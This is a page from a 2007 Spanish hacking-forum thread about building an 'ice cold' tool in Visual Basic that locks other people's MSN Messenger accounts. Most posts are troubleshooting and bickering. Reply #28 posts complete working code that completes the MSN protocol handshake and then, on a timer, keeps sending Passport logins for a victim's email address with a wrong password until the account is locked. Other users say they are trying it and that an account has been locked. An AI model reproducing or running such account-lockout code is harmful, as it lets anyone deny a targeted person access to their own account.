elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Fabricando un congelador tipo ice cold en vb[Optimizado]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 5 6 7 8 Ir Abajo Respuesta Imprimir
Autor Tema: Fabricando un congelador tipo ice cold en vb[Optimizado]  (Leído 29,973 veces)
Tughack


Desconectado Desconectado

Mensajes: 490


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #20 en: 30 Julio 2007, 04:23 am »

pasra TugHack:
te agradeceria que si vas a colaborar que lo hagas, pero no hagas criticas inconstructivas, si lo hiciste en pocas lineas pues postealo (se q no lo haras..) pero no te presumas...
PD: NO seguire esta discucion por parte de tughack... seguire con el resto del aporte.

Pff pues solo hice un comentario k por cierto tiene su parte construtiva... O crees k decirle k esta codigo a mas y k lo puede hacer mejor no es contructivo?

Se solo puedo postear para decir "Muy bien!" no se para k sirve el foro...


En línea

drakolive

Desconectado Desconectado

Mensajes: 141


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #21 en: 30 Julio 2007, 04:59 am »

y mi error????????


En línea

wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #22 en: 30 Julio 2007, 13:44 pm »

drackolive, en una palabra:

INDEX
-----------------

ya me a blokeado la cuenta, pero no se por que razon no ha parado el timer. voy aver que ocurre jejeje
« Última modificación: 30 Julio 2007, 14:25 pm por wACtOr » En línea

drakolive

Desconectado Desconectado

Mensajes: 141


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #23 en: 31 Julio 2007, 02:30 am »

que lio ahora me da este error:

....
Que sucede??????????????????????
En línea

Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #24 en: 31 Julio 2007, 02:35 am »

Alli estas declarando que X es un Modulo y eso no se puede...

En fin:

"Un módulo no es un tipo válido"
En línea

drakolive

Desconectado Desconectado

Mensajes: 141


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #25 en: 31 Julio 2007, 02:39 am »

el codigo que postearon esta asi...
nunca he tenido este problema...
como lo puedo solucionar?
En línea

Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #26 en: 31 Julio 2007, 02:40 am »

Espera a Tegu...
En línea

Arcangel


Desconectado Desconectado

Mensajes: 492


Is About Power...


Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #27 en: 31 Julio 2007, 08:55 am »

Citar
en un modulo de clase llamado cryptocls agregamos este code:

fíjate cryptocls es un modulo DE CLACE, no lo puedes agregar como un modulo común y corriente, en ves de agregar "Module", tienes que pegar ese code en un "Class Module", y pues claro ponerle su nombre correspondiente.

Arcangel
En línea

Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #28 en: 1 Agosto 2007, 03:03 am »

Lo hice hace tiempo y lo posteo, cualquiera con un sniffer puede hacerlo, yo tarde una media hora y mi código son unas pocas lineas.

Todo en un formulario con:
Textbox = Text1
Boton = Command1 = Bloquear
Boton = Command2 = DesBloquear
Label  = Label1

Código:
Private Declare Function InternetOpen Lib "wininet" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Private Declare Function InternetConnect Lib "wininet.dll" Alias "InternetConnectA" (ByVal hInternetSession As Long, ByVal sServerName As String, ByVal nServerPort As Integer, ByVal sUserName As String, ByVal sPassword As String, ByVal lService As Long, ByVal lFlags As Long, ByVal lContext As Long) As Long
Private Declare Function HttpOpenRequest Lib "wininet.dll" Alias "HttpOpenRequestA" (ByVal hHttpSession As Long, ByVal sVerb As String, ByVal sObjectName As String, ByVal sVersion As String, ByVal sReferer As String, ByVal something As Long, ByVal lFlags As Long, ByVal lContext As Long) As Long
Private Declare Function HttpSendRequest Lib "wininet.dll" Alias "HttpSendRequestA" (ByVal hHttpRequest As Long, ByVal sHeaders As String, ByVal lHeadersLength As Long, ByVal sOptional As String, ByVal lOptionalLength As Long) As Long
Private Declare Function HttpQueryInfo Lib "wininet.dll" Alias "HttpQueryInfoA" (ByVal hHttpRequest As Long, ByVal lInfoLevel As Long, ByRef sBuffer As Any, ByRef lBufferLength As Long, ByRef lIndex As Long) As Integer
Private Declare Function InternetCloseHandle Lib "wininet.dll" (ByVal hInet As Long) As Integer
Dim res As String
Dim num As Integer

Private Sub Command1_Click()
Label1.Caption = "Conectando al servidor..."
WS.Close
WS.RemoteHost = "messenger.hotmail.com"
WS.RemotePort = 1863
WS.Connect
End Sub

Private Sub Command2_Click()
Timer1.Enabled = False
Label1.Caption = "Cuenta desbloqueada"
End Sub

Private Sub Timer1_Timer()
Timer1.Enabled = False
If num < 10 Then
num = num + 1
Label1.Caption = "Bloqueando... [" & num * 10 & "%]"
ElseIf num = 10 Then
num = num + 1
Label1.Caption = "Cuenta bloqueada ;)"
End If
Dim tmp2() As String, tmp3 As String, tmp4 As String, hopen As Long, hConnection As Long, hRequest As Long, lgRep As Long, stStatusCode As String
hopen = InternetOpen("MSMSGS", 1, 0, 0, 0)
hConnection = InternetConnect(hopen, "loginnet.passport.com", 443, vbNullString, vbNullString, 3, &H280000, 0)
hRequest = HttpOpenRequest(hConnection, "GET", "/login2.srf", 0, vbNullString, 0, &H84E8F000, 0)
tmp2 = Split(Text1.Text, "@")
tmp4 = tmp2(0) & "%40" & tmp2(1)
tmp3 = "Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=" & tmp4 & ",pwd=crapware, " & res
lgRep = HttpSendRequest(hRequest, tmp3, -1, 0, 0)
stStatusCode = Space$(1000)
HttpQueryInfo hRequest, &H16, ByVal stStatusCode, 1000, 0
InternetCloseHandle hopen
InternetCloseHandle hConnection
InternetCloseHandle hRequest
Timer1.Enabled = True
End Sub

Private Sub WS_Connect()
WS.SendData "VER 1 MSNP8 CVR0" & Chr(13) & Chr(10)
Label1.Caption = "Conectado"
End Sub

Private Sub WS_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
WS.GetData datos

Select Case Left(datos, 3)
Case "VER"
WS.SendData "CVR 2 0x0409 win 4.10 i386 MSNMSGR 5.0.0544 MSMSGS " & Text1.Text & Chr(13) & Chr(10)
Case "CVR"
WS.SendData "USR 3 TWN I " & Text1.Text & Chr(13) & Chr(10)
Case "XFR"
Dim tmp() As String
tmp = Split(datos, " ")
WS.Close
WS.RemoteHost = Left(tmp(3), Len(tmp(3)) - 5)
WS.Connect
Case "USR"
Dim tmp2() As String
tmp2 = Split(datos, " ")
res = tmp2(4)
num = 0
Timer1.Enabled = True
End Select
End Sub
En línea

Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #29 en: 1 Agosto 2007, 03:52 am »

Muy bueno ya lo pruebo...
En línea

Páginas: 1 2 [3] 4 5 6 7 8 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
BitCoin: fabricando dinero digital ¿a costa de terceros?
Noticias
wolfbcn 9 5,307 Último mensaje 17 Junio 2011, 01:10 am
por dantemc
Juego sin engine y mal optimizado
Programación General
AWES0MN 0 4,121 Último mensaje 26 Enero 2013, 22:45 pm
por AWES0MN
Fabricando una Carcasa para Raspberry Pi
Hardware
B€T€B€ 0 1,656 Último mensaje 31 Julio 2019, 01:46 am
por B€T€B€
pregunto sobre el congelador o.o
Foro Libre
nightcode 4 2,231 Último mensaje 13 Octubre 2020, 21:02 pm
por Tachikomaia
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines